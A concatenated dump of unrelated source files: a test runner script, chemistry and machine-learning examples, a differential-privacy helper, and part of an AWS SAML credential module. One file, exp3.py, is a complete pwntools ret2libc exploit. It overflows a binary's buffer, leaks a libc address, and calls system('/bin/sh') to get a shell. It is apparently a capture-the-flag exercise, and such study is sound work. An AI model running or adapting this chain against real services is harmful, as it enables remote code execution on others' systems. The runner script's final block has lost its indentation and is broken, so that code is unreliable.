                        help="Submodule whose tests to run (cluster, constants, ...)")
    parser.add_argument("--pythonpath", "-p", default=None,
                        help="Paths to prepend to PYTHONPATH")
    parser.add_argument("--tests", "-t", action='append',
                        help="Specify tests to run")
    parser.add_argument("--python", action="store_true",
                        help="Start a Python shell with PYTHONPATH set")
    parser.add_argument("--ipython", "-i", action="store_true",
                        help="Start IPython shell with PYTHONPATH set")
    parser.add_argument("--shell", action="store_true",
                        help="Start Unix shell with PYTHONPATH set")
    parser.add_argument("--debug", "-g", action="store_true",
                        help="Debug build")
    parser.add_argument("--parallel", "-j", type=int, default=0,
                        help="Number of parallel jobs during build")
    parser.add_argument("--warn-error", action="store_true",
                        help="Set -Werror to convert all compiler warnings to errors")
    parser.add_argument("--show-build-log", action="store_true",
                        help="Show build output rather than using a log file")
    parser.add_argument("--bench", action="store_true",
                        help="Run benchmark suite instead of test suite")
    parser.add_argument("--bench-compare", action="store", metavar="COMMIT",
                        help=("Compare benchmark results of current HEAD to "
                              "BEFORE. Use an additional "
                              "--bench-compare=COMMIT to override HEAD with "
                              "COMMIT. Note that you need to commit your "
                              "changes first!"))
    parser.add_argument("args", metavar="ARGS", default=[], nargs=REMAINDER,
                        help="Arguments to pass to Nose, Python or shell")
    args = parser.parse_args(argv)

    if args.durations < 0:
        args.durations = -1

    if args.bench_compare:
        args.bench = True
        args.no_build = True  # ASV does the building

    if args.lcov_html:
        # generate C code coverage output
        lcov_generate()
        sys.exit(0)

    if args.pythonpath:
        for p in reversed(args.pythonpath.split(os.pathsep)):
            sys.path.insert(0, p)

    if args.gcov:
        gcov_reset_counters()

    if args.debug and args.bench:
        print("*** Benchmarks should not be run against debug "
              "version; remove -g flag ***")

    if not args.no_build:
        # we need the noarch path in case the package is pure python.
        site_dir, site_dir_noarch = build_project(args)
        sys.path.insert(0, site_dir)
        sys.path.insert(0, site_dir_noarch)
        os.environ['PYTHONPATH'] = site_dir + os.pathsep + site_dir_noarch
    else:
        # Use the already-installed package; derive its site dir from the
        # module's own location.
        _temp = __import__(PROJECT_MODULE)
        site_dir = os.path.sep.join(_temp.__file__.split(os.path.sep)[:-2])

    extra_argv = args.args[:]
    if extra_argv and extra_argv[0] == '--':
        extra_argv = extra_argv[1:]

    if args.python:
        # Debugging issues with warnings is much easier if you can see them
        print("Enabling display of all warnings")
        import warnings
        import types
        warnings.filterwarnings("always")
        if extra_argv:
            # Don't use subprocess, since we don't want to include the
            # current path in PYTHONPATH.
            sys.argv = extra_argv
            with open(extra_argv[0], 'r') as f:
                script = f.read()
            sys.modules['__main__'] = types.ModuleType('__main__')
            ns = dict(__name__='__main__',
                      __file__=extra_argv[0])
            exec_(script, ns)
            sys.exit(0)
        else:
            import code
            code.interact()
            sys.exit(0)

    if args.ipython:
        # Debugging issues with warnings is much easier if you can see them
        print("Enabling display of all warnings and pre-importing numpy as np")
        import warnings
        warnings.filterwarnings("always")
        import IPython
        import numpy as np
        IPython.embed(user_ns={"np": np})
        sys.exit(0)

    if args.shell:
        shell = os.environ.get('SHELL', 'cmd' if os.name == 'nt' else 'sh')
        print("Spawning a shell ({})...".format(shell))
        subprocess.call([shell] + extra_argv)
        sys.exit(0)

    if args.coverage:
        # Wipe any stale HTML report so pytest-cov regenerates it cleanly.
        dst_dir = os.path.join(ROOT_DIR, 'build', 'coverage')
        fn = os.path.join(dst_dir, 'coverage_html.js')
        if os.path.isdir(dst_dir) and os.path.isfile(fn):
            shutil.rmtree(dst_dir)
        extra_argv += ['--cov-report=html:' + dst_dir]

    if args.refguide_check:
        cmd = [os.path.join(ROOT_DIR, 'tools', 'refguide_check.py'),
               '--doctests']
        if args.submodule:
            cmd += [args.submodule]
        # execv replaces this process; the exit below is only a safety net.
        os.execv(sys.executable, [sys.executable] + cmd)
        sys.exit(0)

    if args.bench:
        # Run ASV
        items = extra_argv
        if args.tests:
            items += args.tests
        if args.submodule:
            items += [args.submodule]
        bench_args = []
        for a in items:
            bench_args.extend(['--bench', a])
        if not args.bench_compare:
            cmd = ['asv', 'run', '-n', '-e', '--python=same'] + bench_args
            ret = subprocess.call(cmd, cwd=os.path.join(ROOT_DIR, 'benchmarks'))
            sys.exit(ret)
        else:
            commits = [x.strip() for x in args.bench_compare.split(',')]
            if len(commits) == 1:
                commit_a = commits[0]
                commit_b = 'HEAD'
            elif len(commits) == 2:
                commit_a, commit_b = commits
            else:
                # BUG FIX: this used to call ``p.error`` on the undefined
                # name ``p``; the ArgumentParser lives in ``parser``.
                parser.error("Too many commits to compare benchmarks for")
            # Check for uncommitted files
            if commit_b == 'HEAD':
                r1 = subprocess.call(['git', 'diff-index', '--quiet',
                                      '--cached', 'HEAD'])
                r2 = subprocess.call(['git', 'diff-files', '--quiet'])
                if r1 != 0 or r2 != 0:
                    print("*" * 80)
                    print("WARNING: you have uncommitted changes --- "
                          "these will NOT be benchmarked!")
                    print("*" * 80)
            # Fix commit ids (HEAD is local to current repo)
            out = subprocess.check_output(['git', 'rev-parse', commit_b])
            commit_b = out.strip().decode('ascii')
            out = subprocess.check_output(['git', 'rev-parse', commit_a])
            commit_a = out.strip().decode('ascii')
            cmd = ['asv', 'continuous', '-e', '-f', '1.05',
                   commit_a, commit_b] + bench_args
            ret = subprocess.call(cmd, cwd=os.path.join(ROOT_DIR, 'benchmarks'))
            sys.exit(ret)

    if args.build_only:
        sys.exit(0)
    else:
        __import__(PROJECT_MODULE)
        test = sys.modules[PROJECT_MODULE].test

    if args.submodule:
        tests = [PROJECT_MODULE + "." + args.submodule]
    elif args.tests:
        tests = args.tests
    else:
        tests = None

    # Run the tests under build/test
    if not args.no_build:
        test_dir = site_dir
    else:
        test_dir = os.path.join(ROOT_DIR, 'build', 'test')
        if not os.path.isdir(test_dir):
            os.makedirs(test_dir)

    shutil.copyfile(os.path.join(ROOT_DIR, '.coveragerc'),
                    os.path.join(test_dir, '.coveragerc'))

    cwd = os.getcwd()
    try:
        os.chdir(test_dir)
        result = test(args.mode,
                      verbose=args.verbose,
                      extra_argv=extra_argv,
                      doctests=args.doctests,
                      coverage=args.coverage,
                      durations=args.durations,
                      tests=tests)
    finally:
        os.chdir(cwd)

    if isinstance(result, bool):
        sys.exit(0 if result else 1)
    elif result.wasSuccessful():
        sys.exit(0)
    else:
        sys.exit(1)
def build_project(args):
    """
    Build a dev version of the project.

    Returns
    -------
    site_dir, site_dir_noarch
        The platform-specific and pure-python site-packages directories
        (under build/testenv) where the project was installed.
    """
    import distutils.sysconfig

    root_ok = [os.path.exists(os.path.join(ROOT_DIR, fn))
               for fn in PROJECT_ROOT_FILES]
    if not all(root_ok):
        print("To build the project, run runtests.py in "
              "git checkout or unpacked source")
        sys.exit(1)

    dst_dir = os.path.join(ROOT_DIR, 'build', 'testenv')

    env = dict(os.environ)
    cmd = [sys.executable, 'setup.py']

    # Always use ccache, if installed
    env['PATH'] = os.pathsep.join(EXTRA_PATH + env.get('PATH', '').split(os.pathsep))
    cvars = distutils.sysconfig.get_config_vars()
    compiler = env.get('CC') or cvars.get('CC', '')
    if 'gcc' in compiler:
        # Check that this isn't clang masquerading as gcc.
        if sys.platform != 'darwin' or 'gnu-gcc' in compiler:
            # add flags used as werrors
            warnings_as_errors = ' '.join([
                # from tools/travis-test.sh
                '-Werror=vla',
                '-Werror=nonnull',
                '-Werror=pointer-arith',
                '-Wlogical-op',
                # from sysconfig
                '-Werror=unused-function',
            ])
            env['CFLAGS'] = warnings_as_errors + ' ' + env.get('CFLAGS', '')
    if args.debug or args.gcov:
        # assume everyone uses gcc/gfortran
        env['OPT'] = '-O0 -ggdb'
        env['FOPT'] = '-O0 -ggdb'
        if args.gcov:
            # (OPT/FOPT were previously re-assigned identically here; the
            # duplicate assignments have been removed.)
            env['CC'] = cvars['CC'] + ' --coverage'
            env['CXX'] = cvars['CXX'] + ' --coverage'
            env['F77'] = 'gfortran --coverage '
            env['F90'] = 'gfortran --coverage '
            env['LDSHARED'] = cvars['LDSHARED'] + ' --coverage'
            env['LDFLAGS'] = " ".join(cvars['LDSHARED'].split()[1:]) + ' --coverage'

    cmd += ["build"]
    if args.parallel > 1:
        cmd += ["-j", str(args.parallel)]
    if args.debug_configure:
        cmd += ["build_src", "--verbose"]
    if args.warn_error:
        cmd += ["--warn-error"]
    # Install; avoid producing eggs so numpy can be imported from dst_dir.
    # BUG FIX: the record file used to be dst_dir + 'tmp_install_log.txt'
    # (no separator), writing e.g. build/testenvtmp_install_log.txt.
    cmd += ['install', '--prefix=' + dst_dir,
            '--single-version-externally-managed',
            '--record=' + os.path.join(dst_dir, 'tmp_install_log.txt')]

    from distutils.sysconfig import get_python_lib
    site_dir = get_python_lib(prefix=dst_dir, plat_specific=True)
    site_dir_noarch = get_python_lib(prefix=dst_dir, plat_specific=False)
    # easy_install won't install to a path that Python by default cannot see
    # and isn't on the PYTHONPATH. Plus, it has to exist.
    if not os.path.exists(site_dir):
        os.makedirs(site_dir)
    if not os.path.exists(site_dir_noarch):
        os.makedirs(site_dir_noarch)
    # BUG FIX: use os.pathsep instead of a hard-coded ':' so the build also
    # works on Windows.
    env['PYTHONPATH'] = os.pathsep.join((site_dir, site_dir_noarch))

    log_filename = os.path.join(ROOT_DIR, 'build.log')

    if args.show_build_log:
        ret = subprocess.call(cmd, env=env, cwd=ROOT_DIR)
    else:
        print("Building, see build.log...")
        with open(log_filename, 'w') as log:
            p = subprocess.Popen(cmd, env=env, stdout=log, stderr=log,
                                 cwd=ROOT_DIR)

        try:
            # Wait for it to finish, and print something to indicate the
            # process is alive, but only if the log file has grown (to
            # allow continuous integration environments kill a hanging
            # process accurately if it produces no output)
            last_blip = time.time()
            last_log_size = os.stat(log_filename).st_size
            while p.poll() is None:
                time.sleep(0.5)
                if time.time() - last_blip > 60:
                    log_size = os.stat(log_filename).st_size
                    if log_size > last_log_size:
                        print("    ... build in progress")
                        last_blip = time.time()
                        last_log_size = log_size
            ret = p.wait()
        except:  # noqa: E722 -- re-raised below; also catches KeyboardInterrupt
            p.kill()
            p.wait()
            raise

    if ret == 0:
        print("Build OK")
    else:
        if not args.show_build_log:
            with open(log_filename, 'r') as f:
                print(f.read())
            print("Build failed!")
        sys.exit(1)
    return site_dir, site_dir_noarch
#
# GCOV support
#
def gcov_reset_counters():
    """Delete stale gcov data files (*.gcda / *.da) from the build tree."""
    print("Removing previous GCOV .gcda files...")
    build_dir = os.path.join(ROOT_DIR, 'build')
    for dirpath, _dirnames, filenames in os.walk(build_dir):
        for name in filenames:
            if name.endswith(('.gcda', '.da')):
                os.unlink(os.path.join(dirpath, name))
#
# LCOV support
#
LCOV_OUTPUT_FILE = os.path.join(ROOT_DIR, 'build', 'lcov.out')
LCOV_HTML_DIR = os.path.join(ROOT_DIR, 'build', 'lcov')
def lcov_generate():
    """Capture C coverage data with lcov and render an HTML report under
    build/lcov/ (requires lcov/genhtml on PATH)."""
    # Drop artifacts from any previous run; missing files are fine.
    try:
        os.unlink(LCOV_OUTPUT_FILE)
    except OSError:
        pass
    try:
        shutil.rmtree(LCOV_HTML_DIR)
    except OSError:
        pass

    print("Capturing lcov info...")
    subprocess.call(['lcov', '-q', '-c',
                     '-d', os.path.join(ROOT_DIR, 'build'),
                     '-b', ROOT_DIR,
                     '--output-file', LCOV_OUTPUT_FILE])

    print("Generating lcov HTML output...")
    status = subprocess.call(['genhtml', '-q', LCOV_OUTPUT_FILE,
                              '--output-directory', LCOV_HTML_DIR,
                              '--legend', '--highlight'])
    if status == 0:
        print("HTML output generated under build/lcov/")
    else:
        print("genhtml failed!")
#
# Python 3 support
#
# Provide a uniform exec_(code, globs, locs) across Python 2 and 3.
if sys.version_info[0] >= 3:
# On Python 3, exec is an ordinary builtin function.
import builtins
exec_ = getattr(builtins, "exec")
else:
def exec_(code, globs=None, locs=None):
"""Execute code in a namespace."""
# Default to the caller's globals/locals, mirroring the exec statement.
if globs is None:
frame = sys._getframe(1)
globs = frame.f_globals
if locs is None:
locs = frame.f_locals
del frame
elif locs is None:
locs = globs
# The statement is hidden in a string so this file still parses on Py3.
exec("""exec code in globs, locs""")
# Script entry point: forward the CLI arguments (minus the program name).
if __name__ == "__main__":
main(argv=sys.argv[1:])
| 36.438247
| 88
| 0.560245
|
4a04fb97b1a6aac85ba2d8e61a85fb063ed767f5
| 551
|
py
|
Python
|
examples/ex9_adding_substrates_from_files.py
|
duartegroup/cgbind
|
8c2369d4c49e8b008fc3951719d99e0c4f6b6b16
|
[
"MIT"
] | 7
|
2020-06-08T16:18:56.000Z
|
2021-01-28T09:59:16.000Z
|
examples/ex9_adding_substrates_from_files.py
|
duartegroup/cgbind
|
8c2369d4c49e8b008fc3951719d99e0c4f6b6b16
|
[
"MIT"
] | null | null | null |
examples/ex9_adding_substrates_from_files.py
|
duartegroup/cgbind
|
8c2369d4c49e8b008fc3951719d99e0c4f6b6b16
|
[
"MIT"
] | 2
|
2020-11-16T04:52:43.000Z
|
2021-06-04T05:07:29.000Z
|
# Example: build a metallocage with cgbind and dock a substrate loaded from
# an .xyz file, then print the combined structure.
from cgbind import Cage, Substrate, Linker, CageSubstrateComplex
# Generate an M4L6 bipyridyl Fe(III) based metallocage
linker = Linker(name='linker',
                smiles='C1(C2=CC=C(C#CC3=CN=C(C4=NC=CC=C4)C=C3)C=N2)=NC=CC=C1',
                arch_name='m4l6n')
# NOTE(review): metal_charge is passed as the string '3' here — confirm
# cgbind accepts strings as well as ints for this argument.
cage = Cage(linker, metal='Fe', metal_charge='3')
# Initialise a substrate from the .xyz file, setting the charge and spin
# multiplicity
substrate = Substrate(name='PhO-', filename='phenoxide.xyz', charge=-1, mult=1)
cs = CageSubstrateComplex(cage, substrate)
# Writes the cage+substrate geometry to an .xyz file
cs.print_xyz_file()
| 34.4375
| 79
| 0.700544
|
4a04fbcae8f339821b5dd1fee169c1c63ac1c9b2
| 2,567
|
py
|
Python
|
tensorflow_privacy/privacy/estimators/head_utils.py
|
andrewyguo/privacy
|
a33afde0c105ece6c48b17a80f13899cf3e7c1b3
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_privacy/privacy/estimators/head_utils.py
|
andrewyguo/privacy
|
a33afde0c105ece6c48b17a80f13899cf3e7c1b3
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_privacy/privacy/estimators/head_utils.py
|
andrewyguo/privacy
|
a33afde0c105ece6c48b17a80f13899cf3e7c1b3
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020, The TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Estimator heads that allow integration with TF Privacy."""
from tensorflow_privacy.privacy.estimators.binary_class_head import DPBinaryClassHead
from tensorflow_privacy.privacy.estimators.multi_class_head import DPMultiClassHead
def binary_or_multi_class_head(n_classes, weight_column, label_vocabulary,
                               loss_reduction):
  """Create a DP-enabled estimator head for binary or multi-class tasks.

  Args:
    n_classes: Number of label classes; 2 selects a binary head, anything
      else a multi-class head.
    weight_column: String key or `NumericColumn` identifying per-example
      weights; the example loss is multiplied by this weight.
    label_vocabulary: Optional list of possible string label values. When
      omitted, labels must already be numerically encoded ([0, 1] floats for
      `n_classes=2`, integers in {0, ..., n_classes-1} otherwise).
    loss_reduction: One of `tf.losses.Reduction` except `NONE`; how to reduce
      the training loss over the batch.

  Returns:
    A `Head` instance.
  """
  if n_classes == 2:
    return DPBinaryClassHead(
        weight_column=weight_column,
        label_vocabulary=label_vocabulary,
        loss_reduction=loss_reduction)
  return DPMultiClassHead(
      n_classes,
      weight_column=weight_column,
      label_vocabulary=label_vocabulary,
      loss_reduction=loss_reduction)
| 45.035088
| 85
| 0.73471
|
4a04fc42f63d36c535bffbb99af63f66d3094945
| 120
|
py
|
Python
|
evaluation/__init__.py
|
mertozlutiras/BERTopic_evaluation
|
95b728947b73193caaf7c303fd91f4d8b779c807
|
[
"MIT"
] | 12
|
2022-03-14T07:59:58.000Z
|
2022-03-16T09:14:52.000Z
|
evaluation/__init__.py
|
mertozlutiras/BERTopic_evaluation
|
95b728947b73193caaf7c303fd91f4d8b779c807
|
[
"MIT"
] | null | null | null |
evaluation/__init__.py
|
mertozlutiras/BERTopic_evaluation
|
95b728947b73193caaf7c303fd91f4d8b779c807
|
[
"MIT"
] | 2
|
2022-03-14T07:47:05.000Z
|
2022-03-15T09:20:00.000Z
|
from evaluation.data import DataLoader
from evaluation.evaluation import Trainer
from evaluation.results import Results
| 30
| 41
| 0.875
|
4a04fd1c4187d9164cb1731b6c09f76d1e33e3d6
| 1,045
|
py
|
Python
|
exp3.py
|
TonyShanc/new2pwn
|
6b127fca32e96ff1953dc25c6981610176b927be
|
[
"MIT"
] | null | null | null |
exp3.py
|
TonyShanc/new2pwn
|
6b127fca32e96ff1953dc25c6981610176b927be
|
[
"MIT"
] | null | null | null |
exp3.py
|
TonyShanc/new2pwn
|
6b127fca32e96ff1953dc25c6981610176b927be
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# Python 2 pwntools ret2libc exploit for the 'level2' binary:
# stage 1 leaks write()'s libc address via write@plt, stage 2 computes
# system()/"/bin/sh" from the leak and returns into system("/bin/sh").
from pwn import *
libc = ELF('libc.so')
elf = ELF('level2')
#p = process('./level2')
p = remote('127.0.0.1', 10003)
plt_write = elf.symbols['write']
print 'plt_write= ' + hex(plt_write)
got_write = elf.got['write']
print 'got_write= ' + hex(got_write)
# address of the vulnerable function, used as the return-after-write target
# so the process loops back for the second payload
vulfun_addr = 0x08048404
print 'vulfun= ' + hex(vulfun_addr)
# 140 bytes of padding to the saved return address, then
# write(1, got_write, 4) followed by a return into vulfun
payload1 = 'a'*140 + p32(plt_write) + p32(vulfun_addr) + p32(1) +p32(got_write) + p32(4)
print "\n###sending payload1 ...###"
p.send(payload1)
print "\n###receving write() addr...###"
write_addr = u32(p.recv(4))
print 'write_addr=' + hex(write_addr)
print "\n###calculating system() addr and \"/bin/sh\" addr...###"
# libc symbol offsets are constant, so the leak fixes the load base
system_addr = write_addr - (libc.symbols['write'] - libc.symbols['system'])
print 'system_addr= ' + hex(system_addr)
binsh_addr = write_addr - (libc.symbols['write'] - next(libc.search('/bin/sh')))
print 'binsh_addr= ' + hex(binsh_addr)
# overflow again: return into system() with "/bin/sh" as the argument
payload2 = 'a'*140 + p32(system_addr) + p32(vulfun_addr) + p32(binsh_addr)
print "\n###sending payload2 ...###"
p.send(payload2)
p.interactive()
| 26.794872
| 88
| 0.664115
|
4a04fd8030387094a40d9737c936a1f2f3d961e3
| 2,849
|
py
|
Python
|
python/hongong/source/8_2.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
python/hongong/source/8_2.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
python/hongong/source/8_2.py
|
gangserver/py_test
|
869bdfa5c94c3b6a15b87e0c3de6b2cdaca821f4
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""8-2.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/github/rickiepark/hg-mldl/blob/master/8-2.ipynb
# Image classification with a convolutional neural network
<table align="left">
<td>
<a target="_blank" href="https://colab.research.google.com/github/rickiepark/hg-mldl/blob/master/8-2.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a>
</td>
</table>
## Load the Fashion MNIST dataset
"""
from tensorflow import keras
from sklearn.model_selection import train_test_split
(train_input, train_target), (test_input, test_target) = \
keras.datasets.fashion_mnist.load_data()
# Add the channel dimension and scale pixel values into [0, 1]
train_scaled = train_input.reshape(-1, 28, 28, 1) / 255.0
# Hold out 20% of the training data as a validation split
train_scaled, val_scaled, train_target, val_target = train_test_split(
train_scaled, train_target, test_size=0.2, random_state=42)
"""## 합성곱 신경망 만들기"""
# Section: build the CNN — two conv/max-pool stages, then a dense classifier
# with dropout before the 10-way softmax output.
model = keras.Sequential()
model.add(keras.layers.Conv2D(32, kernel_size=3, activation='relu',
                              padding='same', input_shape=(28,28,1)))
model.add(keras.layers.MaxPooling2D(2))
model.add(keras.layers.Conv2D(64, kernel_size=(3,3), activation='relu',
                              padding='same'))
model.add(keras.layers.MaxPooling2D(2))
model.add(keras.layers.Flatten())
model.add(keras.layers.Dense(100, activation='relu'))
model.add(keras.layers.Dropout(0.4))
model.add(keras.layers.Dense(10, activation='softmax'))
model.summary()
keras.utils.plot_model(model)
keras.utils.plot_model(model, show_shapes=True, to_file='cnn-architecture.png', dpi=300)
"""## 모델 컴파일과 훈련"""
# Section: compile and train with checkpointing and early stopping
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy',
              metrics='accuracy')
checkpoint_cb = keras.callbacks.ModelCheckpoint('best-cnn-model.h5',
                                                save_best_only=True)
early_stopping_cb = keras.callbacks.EarlyStopping(patience=2,
                                                  restore_best_weights=True)
history = model.fit(train_scaled, train_target, epochs=20,
                    validation_data=(val_scaled, val_target),
                    callbacks=[checkpoint_cb, early_stopping_cb])
# Plot train/validation loss curves
import matplotlib.pyplot as plt
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.xlabel('epoch')
plt.ylabel('loss')
plt.legend(['train', 'val'])
plt.show()
model.evaluate(val_scaled, val_target)
# Inspect the first validation image and the model's class probabilities
plt.imshow(val_scaled[0].reshape(28, 28), cmap='gray_r')
plt.show()
preds = model.predict(val_scaled[0:1])
print(preds)
plt.bar(range(1, 11), preds[0])
plt.xlabel('class')
plt.ylabel('prob.')
plt.show()
# Class names (Korean): t-shirt, trouser, pullover, dress, coat,
# sandal, shirt, sneaker, bag, ankle boot
classes = ['티셔츠', '바지', '스웨터', '드레스', '코트',
           '샌달', '셔츠', '스니커즈', '가방', '앵클 부츠']
import numpy as np
print(classes[np.argmax(preds)])
# Final evaluation on the untouched test split
test_scaled = test_input.reshape(-1, 28, 28, 1) / 255.0
model.evaluate(test_scaled, test_target)
| 28.777778
| 195
| 0.678133
|
4a04fdc3c055c5b42928f2030fc7c2d4f6e824ca
| 16,987
|
py
|
Python
|
awsprocesscreds/saml.py
|
gbvanrenswoude/awsprocesscreds
|
99c8a20361ebd495d057e7960e5ef4578d1b3780
|
[
"Apache-2.0"
] | null | null | null |
awsprocesscreds/saml.py
|
gbvanrenswoude/awsprocesscreds
|
99c8a20361ebd495d057e7960e5ef4578d1b3780
|
[
"Apache-2.0"
] | null | null | null |
awsprocesscreds/saml.py
|
gbvanrenswoude/awsprocesscreds
|
99c8a20361ebd495d057e7960e5ef4578d1b3780
|
[
"Apache-2.0"
] | 1
|
2020-03-18T10:38:43.000Z
|
2020-03-18T10:38:43.000Z
|
# pylint: disable=R1710
import base64
import getpass
import logging
import xml.etree.cElementTree as ET
from hashlib import sha1
from copy import deepcopy
import six
import requests
import botocore
from botocore.client import Config
from botocore.compat import urlsplit
from botocore.compat import urljoin
from botocore.compat import json
from botocore.credentials import CachedCredentialFetcher
import botocore.session
import awsprocesscreds
from .compat import escape
class SAMLError(Exception):
    """Raised when SAML configuration or authentication fails."""
logger = logging.getLogger(__name__)
class FormParserError(Exception):
    """Raised when an HTML login form cannot be parsed."""
def _role_selector(role_arn, roles):
    """Pick the IdP role entry whose ``RoleArn`` equals ``role_arn``.

    ``roles`` is a list of dicts like ``[{"RoleArn": "...", ...}, ...]``.
    Returns the first matching dict, or None when nothing matches.
    """
    return next((role for role in roles if role['RoleArn'] == role_arn), None)
class SAMLAuthenticator(object):
    """Interface for pluggable SAML authentication strategies."""

    def is_suitable(self, config):
        """Return True if this instance intends to perform authentication.

        ``config`` is the profile dictionary loaded from the user's profile,
        e.g. ``{'saml_endpoint': 'https://...', 'saml_provider': '...'}``.
        """
        raise NotImplementedError("is_suitable")

    def retrieve_saml_assertion(self, config):
        """Return a SAML assertion when login succeeds, or None otherwise."""
        raise NotImplementedError("retrieve_saml_assertion")
class GenericFormsBasedAuthenticator(SAMLAuthenticator):
USERNAME_FIELDS = ('username',)
PASSWORD_FIELDS = ('password',)
_ERROR_BAD_RESPONSE = (
'Received a non-200 response (%s) when making a request to: %s'
)
_ERROR_NO_FORM = (
'Could not find login form from: %s'
)
_ERROR_MISSING_FORM_FIELD = (
'Error parsing HTML form, could not find the form field: "%s"'
)
_ERROR_LOGIN_FAILED_NON_200 = (
'Login failed, received non 200 response: %s'
)
_ERROR_LOGIN_FAILED = (
'Login failed, could not retrieve SAML assertion. '
'Double check you have entered your password correctly.'
)
_ERROR_MISSING_CONFIG = (
'Missing required config value for SAML: "%s"'
)
def __init__(self, password_prompter, requests_session=None):
    """Form-based SAML assertion retriever.

    Supported workflow: GET ``saml_endpoint``, scrape the HTML login form,
    fill it with username/password, POST it to the form action URL, and
    extract the SAMLAssertion from the returned HTML.

    :param password_prompter: Callable mapping a prompt string to the
        password string entered by the user.
    :param requests_session: Session object used for HTTP calls to the
        SAML provider; a fresh ``requests.Session()`` is created when
        omitted.
    """
    self._requests_session = (requests.Session()
                              if requests_session is None
                              else requests_session)
    self._password_prompter = password_prompter
def is_suitable(self, config):
    """Handle only profiles that opt in to form-based SAML authentication."""
    auth_type = config.get('saml_authentication_type')
    return auth_type == 'form'
def retrieve_saml_assertion(self, config):
"""Retrieve SAML assertion using form based auth.
This is a generic form based authenticator that will
make an HTTP request to retrieve an HTML form, fill in the
form fields with username/password, and submit the form.
:type config: dict
:param config: The config associated with the profile. Contains:
* saml_endpoint
* saml_username
:raises SAMLError: Raised when we are unable to retrieve a
SAML assertion.
:rtype: str
:return: The base64 encoded SAML assertion if the login process
was successful.
"""
# precondition: self.is_suitable() returns true.
# We still need other values in the config dict to work
# properly, so we have to validate config params before
# going any further.
self._validate_config_values(config)
endpoint = config['saml_endpoint']
# Fetch the login form and its submit URL from the IdP.
login_url, form_data = self._retrieve_login_form_from_endpoint(
endpoint)
# Fill in username (and password, when the form has such a field).
self._fill_in_form_values(config, form_data)
response = self._send_form_post(login_url, form_data)
return self._extract_saml_assertion_from_response(response)
def _validate_config_values(self, config):
    """Raise SAMLError when a mandatory SAML profile key is missing."""
    for key in ('saml_endpoint', 'saml_username'):
        if key not in config:
            raise SAMLError(self._ERROR_MISSING_CONFIG % key)
def _retrieve_login_form_from_endpoint(self, endpoint):
response = self._requests_session.get(endpoint, verify=True)
self._assert_non_error_response(response)
login_form_html_node = self._parse_form_from_html(response.text)
if login_form_html_node is None:
raise SAMLError(self._ERROR_NO_FORM % endpoint)
form_action = urljoin(endpoint,
login_form_html_node.attrib.get('action', ''))
if not form_action.lower().startswith('https://'):
raise SAMLError('Your SAML IdP must use HTTPS connection')
payload = dict((tag.attrib['name'], tag.attrib.get('value', ''))
for tag in login_form_html_node.findall(".//input"))
return form_action, payload
def _assert_non_error_response(self, response):
if response.status_code != 200:
raise SAMLError(
self._ERROR_BAD_RESPONSE % (response.status_code,
response.url))
def _parse_form_from_html(self, html):
# Scrape a form from html page, and return it as an elementtree element
parser = FormParser()
parser.feed(html)
if parser.forms:
return ET.fromstring(parser.extract_form(0))
def _fill_in_form_values(self, config, form_data):
username = config['saml_username']
username_field = set(self.USERNAME_FIELDS).intersection(
form_data.keys()
)
if not username_field:
raise SAMLError(
self._ERROR_MISSING_FORM_FIELD % self.USERNAME_FIELDS)
form_data[username_field.pop()] = username
password_field = set(self.PASSWORD_FIELDS).intersection(
form_data.keys()
)
if password_field:
form_data[password_field.pop()] = self._password_prompter(
"Password: ")
def _send_form_post(self, login_url, form_data):
response = self._requests_session.post(
login_url, data=form_data, verify=True
)
if response.status_code != 200:
raise SAMLError(self._ERROR_LOGIN_FAILED_NON_200 %
response.status_code)
return response.text
def _extract_saml_assertion_from_response(self, response_body):
parsed = self._parse_form_from_html(response_body)
if parsed is not None:
assertion = self._get_value_of_first_tag(
parsed, 'input', 'name', 'SAMLResponse')
if assertion is not None:
return assertion
# We can reach here in two cases.
# First, we were able to login but for some reason we can't find the
# SAMLResponse in the response body. The second (and more likely)
# reason is that the login has failed. For example, if you provide an
# invalid password when trying to login, many IdPs will return a 200
# status code and return HTML content that indicates an error occurred.
# This is the error we'll present to the user.
raise SAMLError(self._ERROR_LOGIN_FAILED)
def _get_value_of_first_tag(self, root, tag, attr, trait):
for element in root.findall(tag):
if element.attrib.get(attr) == trait:
return element.attrib.get('value')
class OktaAuthenticator(GenericFormsBasedAuthenticator):
    """Authenticator for Okta IdPs.

    Rather than scraping an HTML login form, Okta exposes a JSON
    primary-authentication API: we POST the credentials there to obtain
    a one-time session token, then fetch the SAML app endpoint with it.
    """

    # Path of Okta's primary authentication API, relative to the IdP host.
    _AUTH_URL = '/api/v1/authn'

    def retrieve_saml_assertion(self, config):
        """Retrieve a SAML assertion using Okta's authn API.

        :type config: dict
        :param config: Profile configuration; must contain
            ``saml_endpoint`` and ``saml_username``.

        :raises SAMLError: If login fails or no assertion is returned.

        :rtype: str
        :return: The base64 encoded SAML assertion.
        """
        self._validate_config_values(config)
        endpoint = config['saml_endpoint']
        hostname = urlsplit(endpoint).netloc
        # Build the auth URL from the class-level constant; previously the
        # path was re-hard-coded inline, leaving _AUTH_URL unused.
        auth_url = 'https://%s%s' % (hostname, self._AUTH_URL)
        username = config['saml_username']
        password = self._password_prompter("Password: ")
        logger.info(
            'Sending HTTP POST with username (%s) and password to Okta API '
            'endpoint: %s', username, auth_url
        )
        response = self._requests_session.post(
            auth_url,
            headers={'Content-Type': 'application/json',
